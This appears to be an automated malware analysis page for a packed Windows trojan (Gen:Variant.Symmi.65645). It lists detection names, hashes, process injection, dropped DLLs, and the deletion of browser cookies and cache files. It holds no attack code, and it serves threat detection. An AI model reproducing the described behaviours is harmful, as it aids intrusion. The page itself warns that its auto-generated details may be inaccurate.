Gen.Variant.Symmi.65645_f23bb1c179

by malwarelabrobot on May 26th, 2017 in Malware Descriptions.

Gen:Variant.Symmi.65645 (BitDefender), HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.DownLoader24.57804 (DrWeb), Gen:Variant.Symmi.65645 (B) (Emsisoft), ML.Attribute.HighConfidence (Symantec), Gen:Variant.Symmi.65645 (FSecure), Win32/DH{NYEOA4IcgQ8?} (AVG), Win32:Malware-gen (Avast), Gen:Variant.Symmi.65645 (AdAware), Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: f23bb1c179fd6ccab543d15af98e5eea
SHA1: b2e2ab681c80a206e901536db74c076fe1cdbf9d
SHA256: fb8c18b71473d8dd6e0f594b7b1d4164ca8b40b830984d7ef4df30fbc4d28a3f
SSDeep: 3072:1yK7mGLup8kviDRZ9P1cQIFM/za1Y1untD Lec73kzXm:1yN7VoRj1czS/W1kgtD p7
Size: 160464 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: ASPackv212, UPolyXv05_v6
Company:
Created at: 2012-09-10 07:32:48
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1024

The Trojan injects its code into the following process(es):

f23bb1c179d6ccab543d15af98e5eea.exe:260

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\mbHtGKAn.dll (12 bytes)
C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (2264 bytes)

The Trojan deletes the following file(s):

C:\Windows\mbHtGKAn.dll (0 bytes)

The process f23bb1c179d6ccab543d15af98e5eea.exe:260 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (44 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
C:\Windows\LMJxkS.dll (10 bytes)
C:\Windows\wrhKvXr\yAXHMEya.tmp (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (272 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
C:\Windows\wrhKvXr\hDuVSc.dll (16661 bytes)
C:\Windows\wrhKvXr\lMmgfUJPh.dll (264 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
C:\Windows\System32\14532e\CDClient_EX.sys (117 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\40ACE2C71721D02751C14CE7231B273A0E58A842 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\7A8D3A9360CC37F0AD80962D4AEA72B6D0F0B2B3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B4F9F19B69C223FD86BA246F4F451CE4FDC81D36 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\eS-nxtWWJ1LfBWLfd096swuFjH4[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ECE64D1A018F9023721AC8B2F25BD83AEB4E8A8C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\fc72ORSzwyUu08nYIdyG-ygy8w8[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_002_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\78A520FE200DD59F7079043C2E4494D582DB5E27 (0 bytes)
C:\Windows\wrhKvXr\lMmgfUJPh.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AD7A5673189C3D8259E7B3FE0033E19E1674CC68 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\AllServices[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\XJJJSX58.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E908A39A09178150ACAC85D34DC9551A0D9AE753 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\doomed\19628 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K3H6JGON.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\frequencyCap.json (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_MAP_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\861A7D6C4E285B4DB10DEE7E49FD59A156C5CB40 (0 bytes)
C:\Windows\LMJxkS.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FDGZES7U.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2A45E92D38EFE84CD90EC2FCC468A5D490FCBD7E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E9B5F1423155DB2E35FD739FC2008DB01C93DE1E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-trackwhite-simple.cache (0 bytes)
C:\Windows\wrhKvXr\hDuVSc.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E347EE129B65E7092ECAFB7CF75A62752357160F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\O761920L.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SK6RC4AQ.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\7ZFPBM01.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\ya_favicon_ru[1].ico (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\PMGXNABP.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\LXL295FY.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4D8FDF1CF46B6BD4BCA2B32F05B47E51876D05AB (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\DB35F7B5C3B638134575506C1DECC7214B0152E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1CBEA138B025655D4A8BCC260B2DAC0D5EDD72D6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\4716F9983487F717BEDB4A2344A95133803762E5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C0F2B5902E53102766C100D0F460054A2443B217 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8FF14B3918ED9F95C48889D4B31C7D7F6E5F0764 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\AE2CE72866097CB9D30937BE22EDFC3338CFF98D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\NWCBOWT9.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\2559C1ED66F9553D151E2FC960388EB1E891B126 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\MG_en-us[1].xml (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\870C1269620CC48AF9164CDC9EA46DA2DC0279C3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\VPSNR0J4.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\41367369B0154D1D2566CC216318C71115E089A2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\24F9514653FD834D9D33E21B4C0AECB308550A9A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8Q2KNK5G.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\983WD333.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozplugin-block-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GB74HSLE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C27D7A62FCB3822B15FE7A889EAC6EBCB8E81A80 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\f[1].txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-block-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\ACEC3E9837AFFBA2F808D2347310A61110A832A8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8D2B634ED057A0D2B7876CD0F9662C750C5AA2E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9563C38CC53D34D0B1FB8D66675A7E1BBB4A7575 (0 bytes)
C:\Windows\wrhKvXr\yAXHMEya.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\IAU75TW2.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\8WNTYFZE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\6ACB9987E5D13DDF930A0216112504F72B35A155 (0 bytes)
C:\Windows\System32\14532e\CDClient_EX.sys (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\C (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\E (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\KK0IK9EV.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9D083EF993029DD270F9A810F6083969DA8594D3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6BC1B0D7B9F7B812F1C9A7542D07DACD74DF8B7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\AW5IGQT7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\35BB6C6081B10CDF7DB50B6EFA374FE53E7BDFF8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\9fkhsVhseQ-JJcxiLZwCHjhHY[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\00CZ9B9Z.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9CB1507E8150B6A3A9D726112952A7150EA6236D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\BPMHTAIlmc5kh6Tymb1I2mmfSAc[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\ZZxR-E_UBI8_1IS7VtDkH_bgw[1].css (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\A8D8BCCCDD886569194B60234F0DADDBCE4DF5E6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\QVWF9XLH.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\SHMEGTHE.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\379IMDJA.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\16F000C509B7DE188B56179BF7EF0DF5B0F613E8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\watch[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\832B7A4416790DB08D1CFF514ABE80568EB2A5AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\1D1FD5C43A3C9601AA6056987017F737DB8ABF7B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\28454981111313E6165BC0032AE7D75973DAA649 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6BE94D0C5013A1F752DB7D7881FD3ED9E40AB2B (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\search[1].htm (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\92127114B1F74C7C0CB98314AB871F3B814368AC (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\48555710E97A743C0DD66647CF47BC74B82E981F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B6D901A89865039CB84FA633FA40EE7DE5D9C921 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\83936E9426867396E4A7F9EFF2AA8303FBC66493 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OLCWAOT0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\FBUBDDF0.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\C1C89E55A2633162B8F74F19EA5F2E0460A59A97 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\otvet.mail[1].png (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\EA9A23A1084DC6272CC8A2C73BFC178501A1F9C0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\P2Z07O4S.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\GF0JZXVN.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\GetMDRCDPOSTURL[1].aspx (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D464384ED883D8C895EC6569D49B7CF849603110 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\spacer[1].gif (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-forbid-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\18D327979AAFFC5AA7350875BD40E2F9D986FEDF (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0631DE882B33C8014FE49B456EC2792EEC013072 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\E6F33F9C62B1EEFC86F28D9C75EF92282FCD9C45 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\9F92779292CF395AC8E7100B8583605320E370B1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\K4EMAOY7.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\thumbnails (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\0 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\1 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\2 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\0EDDF8C091E2FED62E44BEDDDC1723F5BF38FE4F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\5 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\6 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\7 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\8 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\9 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\OF9L3DR3.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\70200C713D242B945A90D91BB201696C2691D293 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-trackwhite-digest256.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\170F54EDBE19BE8676CC69B53BAC08C8932D118A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\jquery.min[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\svg[1].svg (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\26DCE9685ADD07D49FDFDB35AE2FD824135617AA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\OfflineCache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\5E4954707B44E5A4B4ACF5F22B52219A1DCA477F (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\52FF99030399F0A45B6C66414333C5B4FCA4216A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\8D93UTC3\_yaru.ru[1].js (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\509412AB0ECB72A42520795A67ACF843FB0210E3 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\ETGRPT21.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-phish-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\996E251B0D179792066F30DEB82476DF9D5E8B15 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\mozstd-track-digest256.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-unwanted-simple.pset (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\B0DEFA60F24D21925DA6AE83CB4455379305584A (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\91380939B0A3A08A7837F1BA688B498ED2EC3853 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417\_CACHE_001_ (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8394A0B2D8E569F02DE6B550AF6041770722E67D (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\8694F9E3F9C503551C17EDF4F0F30B83BCDF1DCA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-malware-simple.sbstore (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\D6F079F21194AF40050B050CF0C5B7B7593CB819 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\4CWVLDFS.txt (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries\156A5CCBEF01C060EFFE6F1F2FE07786A115FBEA (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing\test-track-simple.cache (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\_search.uk[1].js (0 bytes)
